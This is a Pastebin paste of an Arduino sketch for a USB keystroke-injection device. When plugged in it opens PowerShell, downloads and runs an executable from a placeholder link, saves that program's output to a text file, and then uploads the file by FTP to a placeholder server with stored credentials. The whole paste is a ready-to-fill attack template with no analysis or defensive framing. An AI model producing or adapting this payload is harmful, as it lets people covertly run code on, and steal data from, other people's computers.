Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <NinjaKeyboard.h>
- EthicNinjaKeyboard en;
- void setup()
- {
- en.init(1500);
- en.winRUN("powershell.exe");
- en.echoEnter("$client = new-object System.Net.WebClient; $url = 'http://LINK DOWNLOAD EXE';$tempat = '\l.exe';$client.DownloadFile($url,$tempat);");
- en.echoEnter(".\\NAMA_EXE.exe all > NAMA_TXT.txt");
- en.echoEnter("exit");
- delay (80000);
- en.winRUN("cmd.exe");
- en.echoEnter("ftp ftp.SITUSMU.COM");
- en.echoEnter("PASSWDUSERFTP");
- en.echoEnter("mput NAMA_TXT.txt");
- en.echoEnter("y");
- en.echoEnter("quit");
- en.echoEnter("exit");
- }
- void loop() {
- }
Add Comment
Please, Sign In to add comment